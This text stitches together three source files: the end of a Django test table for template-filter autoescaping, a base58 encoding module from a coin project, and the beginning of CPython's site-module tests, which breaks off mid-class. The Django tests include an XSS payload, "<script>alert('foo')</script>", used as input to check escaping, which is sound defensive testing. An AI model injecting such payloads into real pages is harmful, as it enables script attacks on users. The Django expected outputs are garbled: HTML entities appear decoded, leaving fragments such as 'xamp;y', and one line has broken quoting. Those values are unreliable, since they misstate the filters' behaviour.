'filter-urlize03': ('{% autoescape off %}{{ a|urlize }}{% endautoescape %}', {"a": mark_safe("a & b")}, 'a & b'),
'filter-urlize04': ('{{ a|urlize }}', {"a": mark_safe("a & b")}, 'a & b'),
# This will lead to a nonsense result, but at least it won't be
# exploitable for XSS purposes when auto-escaping is on.
'filter-urlize05': ('{% autoescape off %}{{ a|urlize }}{% endautoescape %}', {"a": "<script>alert('foo')</script>"}, "<script>alert('foo')</script>"),
'filter-urlize06': ('{{ a|urlize }}', {"a": "<script>alert('foo')</script>"}, '<script>alert('foo')</script>'),
# mailto: testing for urlize
'filter-urlize07': ('{{ a|urlize }}', {"a": "Email me at me@example.com"}, 'Email me at <a href="mailto:me@example.com">me@example.com</a>'),
'filter-urlize08': ('{{ a|urlize }}', {"a": "Email me at <me@example.com>"}, 'Email me at <<a href="mailto:me@example.com">me@example.com</a>>'),
'filter-urlizetrunc01': ('{% autoescape off %}{{ a|urlizetrunc:"8" }} {{ b|urlizetrunc:"8" }}{% endautoescape %}', {"a": '"Unsafe" http://example.com/x=&y=', "b": mark_safe('"Safe" http://example.com?x=&y=')}, '"Unsafe" <a href="http://example.com/x=&y=" rel="nofollow">http:...</a> "Safe" <a href="http://example.com?x=&y=" rel="nofollow">http:...</a>'),
'filter-urlizetrunc02': ('{{ a|urlizetrunc:"8" }} {{ b|urlizetrunc:"8" }}', {"a": '"Unsafe" http://example.com/x=&y=', "b": mark_safe('"Safe" http://example.com?x=&y=')}, '"Unsafe" <a href="http://example.com/x=&y=" rel="nofollow">http:...</a> "Safe" <a href="http://example.com?x=&y=" rel="nofollow">http:...</a>'),
'filter-wordcount01': ('{% autoescape off %}{{ a|wordcount }} {{ b|wordcount }}{% endautoescape %}', {"a": "a & b", "b": mark_safe("a & b")}, "3 3"),
'filter-wordcount02': ('{{ a|wordcount }} {{ b|wordcount }}', {"a": "a & b", "b": mark_safe("a & b")}, "3 3"),
'filter-wordwrap01': ('{% autoescape off %}{{ a|wordwrap:"3" }} {{ b|wordwrap:"3" }}{% endautoescape %}', {"a": "a & b", "b": mark_safe("a & b")}, "a &\nb a &\nb"),
'filter-wordwrap02': ('{{ a|wordwrap:"3" }} {{ b|wordwrap:"3" }}', {"a": "a & b", "b": mark_safe("a & b")}, "a &\nb a &\nb"),
'filter-ljust01': ('{% autoescape off %}.{{ a|ljust:"5" }}. .{{ b|ljust:"5" }}.{% endautoescape %}', {"a": "a&b", "b": mark_safe("a&b")}, ".a&b . .a&b ."),
'filter-ljust02': ('.{{ a|ljust:"5" }}. .{{ b|ljust:"5" }}.', {"a": "a&b", "b": mark_safe("a&b")}, ".a&b . .a&b ."),
'filter-rjust01': ('{% autoescape off %}.{{ a|rjust:"5" }}. .{{ b|rjust:"5" }}.{% endautoescape %}', {"a": "a&b", "b": mark_safe("a&b")}, ". a&b. . a&b."),
'filter-rjust02': ('.{{ a|rjust:"5" }}. .{{ b|rjust:"5" }}.', {"a": "a&b", "b": mark_safe("a&b")}, ". a&b. . a&b."),
'filter-center01': ('{% autoescape off %}.{{ a|center:"5" }}. .{{ b|center:"5" }}.{% endautoescape %}', {"a": "a&b", "b": mark_safe("a&b")}, ". a&b . . a&b ."),
'filter-center02': ('.{{ a|center:"5" }}. .{{ b|center:"5" }}.', {"a": "a&b", "b": mark_safe("a&b")}, ". a&b . . a&b ."),
'filter-cut01': ('{% autoescape off %}{{ a|cut:"x" }} {{ b|cut:"x" }}{% endautoescape %}', {"a": "x&y", "b": mark_safe("x&y")}, "&y &y"),
'filter-cut02': ('{{ a|cut:"x" }} {{ b|cut:"x" }}', {"a": "x&y", "b": mark_safe("x&y")}, "&y &y"),
'filter-cut03': ('{% autoescape off %}{{ a|cut:"&" }} {{ b|cut:"&" }}{% endautoescape %}', {"a": "x&y", "b": mark_safe("x&y")}, "xy xamp;y"),
'filter-cut04': ('{{ a|cut:"&" }} {{ b|cut:"&" }}', {"a": "x&y", "b": mark_safe("x&y")}, "xy xamp;y"),
# Passing ';' to cut can break existing HTML entities, so those strings
# are auto-escaped.
'filter-cut05': ('{% autoescape off %}{{ a|cut:";" }} {{ b|cut:";" }}{% endautoescape %}', {"a": "x&y", "b": mark_safe("x&y")}, "x&y x&y"),
'filter-cut06': ('{{ a|cut:";" }} {{ b|cut:";" }}', {"a": "x&y", "b": mark_safe("x&y")}, "x&y x&ampy"),
# The "escape" filter works the same whether autoescape is on or off,
# but it has no effect on strings already marked as safe.
'filter-escape01': ('{{ a|escape }} {{ b|escape }}', {"a": "x&y", "b": mark_safe("x&y")}, "x&y x&y"),
'filter-escape02': ('{% autoescape off %}{{ a|escape }} {{ b|escape }}{% endautoescape %}', {"a": "x&y", "b": mark_safe("x&y")}, "x&y x&y"),
# It is only applied once, regardless of the number of times it
# appears in a chain.
'filter-escape03': ('{% autoescape off %}{{ a|escape|escape }}{% endautoescape %}', {"a": "x&y"}, "x&y"),
'filter-escape04': ('{{ a|escape|escape }}', {"a": "x&y"}, "x&y"),
# Force_escape is applied immediately. It can be used to provide
# double-escaping, for example.
'filter-force-escape01': ('{% autoescape off %}{{ a|force_escape }}{% endautoescape %}', {"a": "x&y"}, "x&y"),
'filter-force-escape02': ('{{ a|force_escape }}', {"a": "x&y"}, "x&y"),
'filter-force-escape03': ('{% autoescape off %}{{ a|force_escape|force_escape }}{% endautoescape %}', {"a": "x&y"}, "x&amp;y"),
'filter-force-escape04': ('{{ a|force_escape|force_escape }}', {"a": "x&y"}, "x&amp;y"),
# Because the result of force_escape is "safe", an additional
# escape filter has no effect.
'filter-force-escape05': ('{% autoescape off %}{{ a|force_escape|escape }}{% endautoescape %}', {"a": "x&y"}, "x&y"),
'filter-force-escape06': ('{{ a|force_escape|escape }}', {"a": "x&y"}, "x&y"),
'filter-force-escape07': ('{% autoescape off %}{{ a|escape|force_escape }}{% endautoescape %}', {"a": "x&y"}, "x&y"),
'filter-force-escape08': ('{{ a|escape|force_escape }}', {"a": "x&y"}, "x&y"),
# The contents in "linebreaks" and "linebreaksbr" are escaped
# according to the current autoescape setting.
'filter-linebreaks01': ('{{ a|linebreaks }} {{ b|linebreaks }}', {"a": "x&\ny", "b": mark_safe("x&\ny")}, "<p>x&<br />y</p> <p>x&<br />y</p>"),
'filter-linebreaks02': ('{% autoescape off %}{{ a|linebreaks }} {{ b|linebreaks }}{% endautoescape %}', {"a": "x&\ny", "b": mark_safe("x&\ny")}, "<p>x&<br />y</p> <p>x&<br />y</p>"),
'filter-linebreaksbr01': ('{{ a|linebreaksbr }} {{ b|linebreaksbr }}', {"a": "x&\ny", "b": mark_safe("x&\ny")}, "x&<br />y x&<br />y"),
'filter-linebreaksbr02': ('{% autoescape off %}{{ a|linebreaksbr }} {{ b|linebreaksbr }}{% endautoescape %}', {"a": "x&\ny", "b": mark_safe("x&\ny")}, "x&<br />y x&<br />y"),
'filter-safe01': ("{{ a }} -- {{ a|safe }}", {"a": "<b>hello</b>"}, "<b>hello</b> -- <b>hello</b>"),
'filter-safe02': ("{% autoescape off %}{{ a }} -- {{ a|safe }}{% endautoescape %}", {"a": "<b>hello</b>"}, "<b>hello</b> -- <b>hello</b>"),
'filter-safeseq01': ('{{ a|join:", " }} -- {{ a|safeseq|join:", " }}', {"a": ["&", "<"]}, "&, < -- &, <"),
'filter-safeseq02': ('{% autoescape off %}{{ a|join:", " }} -- {{ a|safeseq|join:", " }}{% endautoescape %}', {"a": ["&", "<"]}, "&, < -- &, <"),
'filter-removetags01': ('{{ a|removetags:"a b" }} {{ b|removetags:"a b" }}', {"a": "<a>x</a> <p><b>y</b></p>", "b": mark_safe("<a>x</a> <p><b>y</b></p>")}, "x <p>y</p> x <p>y</p>"),
'filter-removetags02': ('{% autoescape off %}{{ a|removetags:"a b" }} {{ b|removetags:"a b" }}{% endautoescape %}', {"a": "<a>x</a> <p><b>y</b></p>", "b": mark_safe("<a>x</a> <p><b>y</b></p>")}, "x <p>y</p> x <p>y</p>"),
'filter-striptags01': ('{{ a|striptags }} {{ b|striptags }}', {"a": "<a>x</a> <p><b>y</b></p>", "b": mark_safe("<a>x</a> <p><b>y</b></p>")}, "x y x y"),
'filter-striptags02': ('{% autoescape off %}{{ a|striptags }} {{ b|striptags }}{% endautoescape %}', {"a": "<a>x</a> <p><b>y</b></p>", "b": mark_safe("<a>x</a> <p><b>y</b></p>")}, "x y x y"),
'filter-first01': ('{{ a|first }} {{ b|first }}', {"a": ["a&b", "x"], "b": [mark_safe("a&b"), "x"]}, "a&b a&b"),
'filter-first02': ('{% autoescape off %}{{ a|first }} {{ b|first }}{% endautoescape %}', {"a": ["a&b", "x"], "b": [mark_safe("a&b"), "x"]}, "a&b a&b"),
'filter-last01': ('{{ a|last }} {{ b|last }}', {"a": ["x", "a&b"], "b": ["x", mark_safe("a&b")]}, "a&b a&b"),
'filter-last02': ('{% autoescape off %}{{ a|last }} {{ b|last }}{% endautoescape %}', {"a": ["x", "a&b"], "b": ["x", mark_safe("a&b")]}, "a&b a&b"),
'filter-random01': ('{{ a|random }} {{ b|random }}', {"a": ["a&b", "a&b"], "b": [mark_safe("a&b"), mark_safe("a&b")]}, "a&b a&b"),
'filter-random02': ('{% autoescape off %}{{ a|random }} {{ b|random }}{% endautoescape %}', {"a": ["a&b", "a&b"], "b": [mark_safe("a&b"), mark_safe("a&b")]}, "a&b a&b"),
'filter-slice01': ('{{ a|slice:"1:3" }} {{ b|slice:"1:3" }}', {"a": "a&b", "b": mark_safe("a&b")}, "&b &b"),
'filter-slice02': ('{% autoescape off %}{{ a|slice:"1:3" }} {{ b|slice:"1:3" }}{% endautoescape %}', {"a": "a&b", "b": mark_safe("a&b")}, "&b &b"),
'filter-unordered_list01': ('{{ a|unordered_list }}', {"a": ["x>", [["<y", []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
'filter-unordered_list02': ('{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}', {"a": ["x>", [["<y", []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
'filter-unordered_list03': ('{{ a|unordered_list }}', {"a": ["x>", [[mark_safe("<y"), []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
'filter-unordered_list04': ('{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}', {"a": ["x>", [[mark_safe("<y"), []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
'filter-unordered_list05': ('{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}', {"a": ["x>", [["<y", []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
# Literal string arguments to the default filter are always treated as
# safe strings, regardless of the auto-escaping state.
#
# Note: we have to use {"a": ""} here, otherwise the invalid template
# variable string interferes with the test result.
'filter-default01': ('{{ a|default:"x<" }}', {"a": ""}, "x<"),
'filter-default02': ('{% autoescape off %}{{ a|default:"x<" }}{% endautoescape %}', {"a": ""}, "x<"),
'filter-default03': ('{{ a|default:"x<" }}', {"a": mark_safe("x>")}, "x>"),
'filter-default04': ('{% autoescape off %}{{ a|default:"x<" }}{% endautoescape %}', {"a": mark_safe("x>")}, "x>"),
'filter-default_if_none01': ('{{ a|default:"x<" }}', {"a": None}, "x<"),
'filter-default_if_none02': ('{% autoescape off %}{{ a|default:"x<" }}{% endautoescape %}', {"a": None}, "x<"),
'filter-phone2numeric01': ('{{ a|phone2numeric }} {{ b|phone2numeric }}', {"a": "<1-800-call-me>", "b": mark_safe("<1-800-call-me>") }, "<1-800-2255-63> <1-800-2255-63>"),
'filter-phone2numeric02': ('{% autoescape off %}{{ a|phone2numeric }} {{ b|phone2numeric }}{% endautoescape %}', {"a": "<1-800-call-me>", "b": mark_safe("<1-800-call-me>") }, "<1-800-2255-63> <1-800-2255-63>"),
'filter-phone2numeric03': ('{{ a|phone2numeric }}', {"a": "How razorback-jumping frogs can level six piqued gymnasts!"}, "469 729672225-5867464 37647 226 53835 749 747833 49662787!"),
# Ensure iriencode keeps safe strings:
'filter-iriencode01': ('{{ url|iriencode }}', {'url': '?test=1&me=2'}, '?test=1&me=2'),
'filter-iriencode02': ('{% autoescape off %}{{ url|iriencode }}{% endautoescape %}', {'url': '?test=1&me=2'}, '?test=1&me=2'),
'filter-iriencode03': ('{{ url|iriencode }}', {'url': mark_safe('?test=1&me=2')}, '?test=1&me=2'),
'filter-iriencode04': ('{% autoescape off %}{{ url|iriencode }}{% endautoescape %}', {'url': mark_safe('?test=1&me=2')}, '?test=1&me=2'),
# urlencode
'filter-urlencode01': ('{{ url|urlencode }}', {'url': '/test&"/me?/'}, '/test%26%22/me%3F/'),
'filter-urlencode02': ('/test/{{ urlbit|urlencode:"" }}/', {'urlbit': 'escape/slash'}, '/test/escape%2Fslash/'),
# Chaining a bunch of safeness-preserving filters should not alter
# the safe status either way.
'chaining01': ('{{ a|capfirst|center:"7" }}.{{ b|capfirst|center:"7" }}', {"a": "a < b", "b": mark_safe("a < b")}, " A < b . A < b "),
'chaining02': ('{% autoescape off %}{{ a|capfirst|center:"7" }}.{{ b|capfirst|center:"7" }}{% endautoescape %}', {"a": "a < b", "b": mark_safe("a < b")}, " A < b . A < b "),
# Using a filter that forces a string back to unsafe:
'chaining03': ('{{ a|cut:"b"|capfirst }}.{{ b|cut:"b"|capfirst }}', {"a": "a < b", "b": mark_safe("a < b")}, "A < .A < "),
'chaining04': ('{% autoescape off %}{{ a|cut:"b"|capfirst }}.{{ b|cut:"b"|capfirst }}{% endautoescape %}', {"a": "a < b", "b": mark_safe("a < b")}, "A < .A < "),
# Using a filter that forces safeness does not lead to double-escaping
'chaining05': ('{{ a|escape|capfirst }}', {"a": "a < b"}, "A < b"),
'chaining06': ('{% autoescape off %}{{ a|escape|capfirst }}{% endautoescape %}', {"a": "a < b"}, "A < b"),
# Force to safe, then back (also showing why using force_escape too
# early in a chain can lead to unexpected results).
'chaining07': ('{{ a|force_escape|cut:";" }}', {"a": "a < b"}, "a &lt b"),
'chaining08': ('{% autoescape off %}{{ a|force_escape|cut:";" }}{% endautoescape %}', {"a": "a < b"}, "a < b"),
'chaining09': ('{{ a|cut:";"|force_escape }}', {"a": "a < b"}, "a < b"),
'chaining10': ('{% autoescape off %}{{ a|cut:";"|force_escape }}{% endautoescape %}', {"a": "a < b"}, "a < b"),
'chaining11': ('{{ a|cut:"b"|safe }}', {"a": "a < b"}, "a < "),
'chaining12': ('{% autoescape off %}{{ a|cut:"b"|safe }}{% endautoescape %}', {"a": "a < b"}, "a < "),
'chaining13': ('{{ a|safe|force_escape }}', {"a": "a < b"}, "a < b"),
'chaining14': ('{% autoescape off %}{{ a|safe|force_escape }}{% endautoescape %}', {"a": "a < b"}, "a < b"),
# Filters decorated with stringfilter still respect is_safe.
'autoescape-stringfilter01': (r'{{ unsafe|capfirst }}', {'unsafe': UnsafeClass()}, 'You & me'),
'autoescape-stringfilter02': (r'{% autoescape off %}{{ unsafe|capfirst }}{% endautoescape %}', {'unsafe': UnsafeClass()}, 'You & me'),
'autoescape-stringfilter03': (r'{{ safe|capfirst }}', {'safe': SafeClass()}, 'You > me'),
'autoescape-stringfilter04': (r'{% autoescape off %}{{ safe|capfirst }}{% endautoescape %}', {'safe': SafeClass()}, 'You > me'),
'escapejs01': (r'{{ a|escapejs }}', {'a': 'testing\r\njavascript \'string" <b>escaping</b>'}, 'testing\\u000D\\u000Ajavascript \\u0027string\\u0022 \\u003Cb\\u003Eescaping\\u003C/b\\u003E'),
'escapejs02': (r'{% autoescape off %}{{ a|escapejs }}{% endautoescape %}', {'a': 'testing\r\njavascript \'string" <b>escaping</b>'}, 'testing\\u000D\\u000Ajavascript \\u0027string\\u0022 \\u003Cb\\u003Eescaping\\u003C/b\\u003E'),
# length filter.
'length01': ('{{ list|length }}', {'list': ['4', None, True, {}]}, '4'),
'length02': ('{{ list|length }}', {'list': []}, '0'),
'length03': ('{{ string|length }}', {'string': ''}, '0'),
'length04': ('{{ string|length }}', {'string': 'django'}, '6'),
# Invalid uses that should fail silently.
'length05': ('{{ int|length }}', {'int': 7}, ''),
'length06': ('{{ None|length }}', {'None': None}, ''),
# length_is filter.
'length_is01': ('{% if some_list|length_is:"4" %}Four{% endif %}', {'some_list': ['4', None, True, {}]}, 'Four'),
'length_is02': ('{% if some_list|length_is:"4" %}Four{% else %}Not Four{% endif %}', {'some_list': ['4', None, True, {}, 17]}, 'Not Four'),
'length_is03': ('{% if mystring|length_is:"4" %}Four{% endif %}', {'mystring': 'word'}, 'Four'),
'length_is04': ('{% if mystring|length_is:"4" %}Four{% else %}Not Four{% endif %}', {'mystring': 'Python'}, 'Not Four'),
'length_is05': ('{% if mystring|length_is:"4" %}Four{% else %}Not Four{% endif %}', {'mystring': ''}, 'Not Four'),
'length_is06': ('{% with var|length as my_length %}{{ my_length }}{% endwith %}', {'var': 'django'}, '6'),
# Boolean return value from length_is should not be coerced to a string
'length_is07': (r'{% if "X"|length_is:0 %}Length is 0{% else %}Length not 0{% endif %}', {}, 'Length not 0'),
'length_is08': (r'{% if "X"|length_is:1 %}Length is 1{% else %}Length not 1{% endif %}', {}, 'Length is 1'),
# Invalid uses that should fail silently.
'length_is09': ('{{ var|length_is:"fish" }}', {'var': 'django'}, ''),
'length_is10': ('{{ int|length_is:"1" }}', {'int': 7}, ''),
'length_is11': ('{{ none|length_is:"1" }}', {'none': None}, ''),
'join01': (r'{{ a|join:", " }}', {'a': ['alpha', 'beta & me']}, 'alpha, beta & me'),
'join02': (r'{% autoescape off %}{{ a|join:", " }}{% endautoescape %}', {'a': ['alpha', 'beta & me']}, 'alpha, beta & me'),
'join03': (r'{{ a|join:" & " }}', {'a': ['alpha', 'beta & me']}, 'alpha & beta & me'),
'join04': (r'{% autoescape off %}{{ a|join:" & " }}{% endautoescape %}', {'a': ['alpha', 'beta & me']}, 'alpha & beta & me'),
# Test that joining with unsafe joiners don't result in unsafe strings (#11377)
'join05': (r'{{ a|join:var }}', {'a': ['alpha', 'beta & me'], 'var': ' & '}, 'alpha & beta & me'),
'join06': (r'{{ a|join:var }}', {'a': ['alpha', 'beta & me'], 'var': mark_safe(' & ')}, 'alpha & beta & me'),
'join07': (r'{{ a|join:var|lower }}', {'a': ['Alpha', 'Beta & me'], 'var': ' & ' }, 'alpha & beta & me'),
'join08': (r'{{ a|join:var|lower }}', {'a': ['Alpha', 'Beta & me'], 'var': mark_safe(' & ')}, 'alpha & beta & me'),
'date01': (r'{{ d|date:"m" }}', {'d': datetime(2008, 1, 1)}, '01'),
'date02': (r'{{ d|date }}', {'d': datetime(2008, 1, 1)}, 'Jan. 1, 2008'),
#Ticket 9520: Make sure |date doesn't blow up on non-dates
'date03': (r'{{ d|date:"m" }}', {'d': 'fail_string'}, ''),
# ISO date formats
'date04': (r'{{ d|date:"o" }}', {'d': datetime(2008, 12, 29)}, '2009'),
'date05': (r'{{ d|date:"o" }}', {'d': datetime(2010, 1, 3)}, '2009'),
# Timezone name
'date06': (r'{{ d|date:"e" }}', {'d': datetime(2009, 3, 12, tzinfo=FixedOffset(30))}, '+0030'),
'date07': (r'{{ d|date:"e" }}', {'d': datetime(2009, 3, 12)}, ''),
# Ticket 19370: Make sure |date doesn't blow up on a midnight time object
'date08': (r'{{ t|date:"H:i" }}', {'t': time(0, 1)}, '00:01'),
'date09': (r'{{ t|date:"H:i" }}', {'t': time(0, 0)}, '00:00'),
# Tests for #11687 and #16676
'add01': (r'{{ i|add:"5" }}', {'i': 2000}, '2005'),
'add02': (r'{{ i|add:"napis" }}', {'i': 2000}, ''),
'add03': (r'{{ i|add:16 }}', {'i': 'not_an_int'}, ''),
'add04': (r'{{ i|add:"16" }}', {'i': 'not_an_int'}, 'not_an_int16'),
'add05': (r'{{ l1|add:l2 }}', {'l1': [1, 2], 'l2': [3, 4]}, '[1, 2, 3, 4]'),
'add06': (r'{{ t1|add:t2 }}', {'t1': (3, 4), 't2': (1, 2)}, '(3, 4, 1, 2)'),
'add07': (r'{{ d|add:t }}', {'d': date(2000, 1, 1), 't': timedelta(10)}, 'Jan. 11, 2000'),
}
| bsd-3-clause |
bitmagnet/mehcoin | contrib/testgen/base58.py | 2139 | 2818 | '''
Bitcoin base58 encoding and decoding.
Based on https://bitcointalk.org/index.php?topic=1026.0 (public domain)
'''
import hashlib
# for compatibility with following code...
class SHA256:
    """Thin adapter exposing hashlib.sha256 under a PyCrypto-style
    ``SHA256.new`` interface, for compatibility with the code below."""
    new = hashlib.sha256
if str != bytes:
    # Python 3.x
    # On Python 3, indexing/iterating a bytes object already yields ints,
    # so shadow the builtins with byte-oriented equivalents used below.
    def ord(c):
        # c is already an int when taken from a bytes object
        return c
    def chr(n):
        # build a single-byte bytes object from an int value
        return bytes( (n,) )
# Base58 alphabet: digits and letters excluding 0, O, I and l, which are
# visually ambiguous.
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)  # 58
b58chars = __b58chars  # public alias
def b58encode(v):
    """ encode v, which is a string of bytes, to base58.

    Leading zero bytes are encoded as leading '1' characters, following
    Bitcoin's convention.
    """
    alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
    base = len(alphabet)

    # Interpret v as a big-endian unsigned integer.
    long_value = 0
    for (i, c) in enumerate(v[::-1]):
        if not isinstance(c, int):
            # Python 2: iterating bytes yields 1-char strings
            c = ord(c)
        long_value += (256**i) * c

    # Emit base58 digits, most significant first.
    result = ''
    while long_value >= base:
        long_value, mod = divmod(long_value, base)
        result = alphabet[mod] + result
    result = alphabet[long_value] + result

    # Bitcoin leading-zero compression: each leading 0x00 byte becomes '1'.
    # BUGFIX: the original compared bytes elements against '\0', which never
    # matches on Python 3 (elements are ints), silently dropping the pad.
    nPad = 0
    for c in v:
        if c == 0 or c == '\0':
            nPad += 1
        else:
            break
    return (alphabet[0] * nPad) + result
def b58decode(v, length = None):
    """ decode v into a string of len bytes

    Returns None if v contains a character outside the base58 alphabet, or
    if `length` is given and the decoded result has a different length.
    """
    alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
    base = len(alphabet)

    # Interpret v as a big-endian base58 integer, rejecting bad digits.
    long_value = 0
    for (i, c) in enumerate(v[::-1]):
        digit = alphabet.find(c)
        if digit == -1:
            # BUGFIX: the original folded invalid characters in as -1,
            # silently producing a corrupt value; fail the decode instead.
            return None
        long_value += digit * (base**i)

    # Emit bytes, most significant first. bytes(bytearray(...)) yields str
    # on Python 2 and bytes on Python 3, so no chr() shim is needed.
    digits = []
    while long_value >= 256:
        long_value, mod = divmod(long_value, 256)
        digits.append(mod)
    digits.append(long_value)
    digits.reverse()
    result = bytes(bytearray(digits))

    # Leading '1' characters encode leading zero bytes.
    nPad = 0
    for c in v:
        if c == alphabet[0]:
            nPad += 1
        else:
            break
    result = bytes(bytearray(nPad)) + result

    if length is not None and len(result) != length:
        return None
    return result
def checksum(v):
    """Return a 32-bit checksum: the first four bytes of SHA256(SHA256(v))."""
    inner = SHA256.new(v).digest()
    return SHA256.new(inner).digest()[:4]
def b58encode_chk(v):
    """b58encode a string, with 32-bit checksum"""
    payload = v + checksum(v)
    return b58encode(payload)
def b58decode_chk(v):
    """decode a base58 string, check and remove checksum

    Returns the payload bytes on success, or None if decoding fails or the
    trailing 4-byte checksum does not match.
    """
    result = b58decode(v)
    if result is None or len(result) < 4:
        # undecodable, or too short to even carry a checksum
        return None
    payload, check = result[:-4], result[-4:]
    # BUGFIX: the original computed the checksum into h3 and then ignored
    # it, hashing the payload a second time in the comparison.
    if check == checksum(payload):
        return payload
    return None
def get_bcaddress_version(strAddress):
    """ Returns None if strAddress is invalid. Otherwise returns integer version of address. """
    decoded = b58decode_chk(strAddress)
    # A valid address payload is exactly 21 bytes: 1 version byte + 20-byte hash.
    if decoded is None or len(decoded) != 21:
        return None
    return ord(decoded[0])
if __name__ == '__main__':
    # Test case (from http://gitorious.org/bitcoin/python-base58.git)
    # BUGFIX: use ==, not "is" — identity of small ints is a CPython
    # implementation detail, and "x is 0" raises a SyntaxWarning on
    # modern Python.
    assert get_bcaddress_version('15VjRaDX9zpbA8LVnbrCAFzrVzN7ixHNsC') == 0
    _ohai = 'o hai'.encode('ascii')
    _tmp = b58encode(_ohai)
    assert _tmp == 'DYB3oMS'
    assert b58decode(_tmp, 5) == _ohai
    print("Tests passed")
| mit |
ybellavance/python-for-android | python3-alpha/python3-src/Lib/test/test_site.py | 49 | 16063 | """Tests for 'site'.
Tests assume the initial paths in sys.path once the interpreter has begun
executing have not been removed.
"""
import unittest
from test.support import run_unittest, TESTFN, EnvironmentVarGuard
from test.support import captured_stderr
import builtins
import os
import sys
import re
import encodings
import subprocess
import sysconfig
from copy import copy
# Need to make sure to not import 'site' if someone specified ``-S`` at the
# command-line. Detect this by just making sure 'site' has not been imported
# already.
if "site" in sys.modules:
    import site
else:
    raise unittest.SkipTest("importation of site.py suppressed")

# Import-time side effect: make sure the user site directory exists and is
# on sys.path before any of the test classes below run.
if not os.path.isdir(site.USER_SITE):
    # need to add user site directory for tests
    os.makedirs(site.USER_SITE)
    site.addsitedir(site.USER_SITE)
class HelperFunctionsTests(unittest.TestCase):
    """Tests for helper functions.

    Each test saves and restores the site/sysconfig module-level state it
    mutates (see setUp/tearDown).
    """

    def setUp(self):
        """Save a copy of sys.path"""
        # Also snapshot the user-site globals and sysconfig vars mutated by
        # the tests below, so tearDown can restore them.
        self.sys_path = sys.path[:]
        self.old_base = site.USER_BASE
        self.old_site = site.USER_SITE
        self.old_prefixes = site.PREFIXES
        self.old_vars = copy(sysconfig._CONFIG_VARS)

    def tearDown(self):
        """Restore sys.path"""
        sys.path[:] = self.sys_path
        site.USER_BASE = self.old_base
        site.USER_SITE = self.old_site
        site.PREFIXES = self.old_prefixes
        sysconfig._CONFIG_VARS = self.old_vars

    def test_makepath(self):
        # Test makepath() have an absolute path for its first return value
        # and a case-normalized version of the absolute path for its
        # second value.
        path_parts = ("Beginning", "End")
        original_dir = os.path.join(*path_parts)
        abs_dir, norm_dir = site.makepath(*path_parts)
        self.assertEqual(os.path.abspath(original_dir), abs_dir)
        if original_dir == os.path.normcase(original_dir):
            self.assertEqual(abs_dir, norm_dir)
        else:
            self.assertEqual(os.path.normcase(abs_dir), norm_dir)

    def test_init_pathinfo(self):
        # _init_pathinfo() should return a set containing every existing
        # directory currently on sys.path, in normalized form.
        dir_set = site._init_pathinfo()
        for entry in [site.makepath(path)[1] for path in sys.path
                        if path and os.path.isdir(path)]:
            self.assertIn(entry, dir_set,
                          "%s from sys.path not found in set returned "
                          "by _init_pathinfo(): %s" % (entry, dir_set))

    def pth_file_tests(self, pth_file):
        """Contain common code for testing results of reading a .pth file"""
        self.assertIn(pth_file.imported, sys.modules,
                      "%s not in sys.modules" % pth_file.imported)
        self.assertIn(site.makepath(pth_file.good_dir_path)[0], sys.path)
        self.assertFalse(os.path.exists(pth_file.bad_dir_path))

    def test_addpackage(self):
        # Make sure addpackage() imports if the line starts with 'import',
        # adds directories to sys.path for any line in the file that is not a
        # comment or import that is a valid directory name for where the .pth
        # file resides; invalid directories are not added
        pth_file = PthFile()
        pth_file.cleanup(prep=True)  # to make sure that nothing is
                                     # pre-existing that shouldn't be
        try:
            pth_file.create()
            site.addpackage(pth_file.base_dir, pth_file.filename, set())
            self.pth_file_tests(pth_file)
        finally:
            pth_file.cleanup()

    def make_pth(self, contents, pth_dir='.', pth_name=TESTFN):
        # Create a .pth file and return its (abspath, basename).
        # Removal of the file is registered via addCleanup.
        pth_dir = os.path.abspath(pth_dir)
        pth_basename = pth_name + '.pth'
        pth_fn = os.path.join(pth_dir, pth_basename)
        pth_file = open(pth_fn, 'w', encoding='utf-8')
        self.addCleanup(lambda: os.remove(pth_fn))
        pth_file.write(contents)
        pth_file.close()
        return pth_dir, pth_basename

    def test_addpackage_import_bad_syntax(self):
        # Issue 10642
        pth_dir, pth_fn = self.make_pth("import bad)syntax\n")
        with captured_stderr() as err_out:
            site.addpackage(pth_dir, pth_fn, set())
        self.assertRegex(err_out.getvalue(), "line 1")
        self.assertRegex(err_out.getvalue(),
            re.escape(os.path.join(pth_dir, pth_fn)))
        # XXX: the previous two should be independent checks so that the
        # order doesn't matter. The next three could be a single check
        # but my regex foo isn't good enough to write it.
        self.assertRegex(err_out.getvalue(), 'Traceback')
        self.assertRegex(err_out.getvalue(), r'import bad\)syntax')
        self.assertRegex(err_out.getvalue(), 'SyntaxError')

    def test_addpackage_import_bad_exec(self):
        # Issue 10642
        pth_dir, pth_fn = self.make_pth("randompath\nimport nosuchmodule\n")
        with captured_stderr() as err_out:
            site.addpackage(pth_dir, pth_fn, set())
        self.assertRegex(err_out.getvalue(), "line 2")
        self.assertRegex(err_out.getvalue(),
            re.escape(os.path.join(pth_dir, pth_fn)))
        # XXX: ditto previous XXX comment.
        self.assertRegex(err_out.getvalue(), 'Traceback')
        self.assertRegex(err_out.getvalue(), 'ImportError')

    @unittest.skipIf(sys.platform == "win32", "Windows does not raise an "
                        "error for file paths containing null characters")
    def test_addpackage_import_bad_pth_file(self):
        # Issue 5258
        pth_dir, pth_fn = self.make_pth("abc\x00def\n")
        with captured_stderr() as err_out:
            site.addpackage(pth_dir, pth_fn, set())
        self.assertRegex(err_out.getvalue(), "line 1")
        self.assertRegex(err_out.getvalue(),
            re.escape(os.path.join(pth_dir, pth_fn)))
        # XXX: ditto previous XXX comment.
        self.assertRegex(err_out.getvalue(), 'Traceback')
        self.assertRegex(err_out.getvalue(), 'TypeError')

    def test_addsitedir(self):
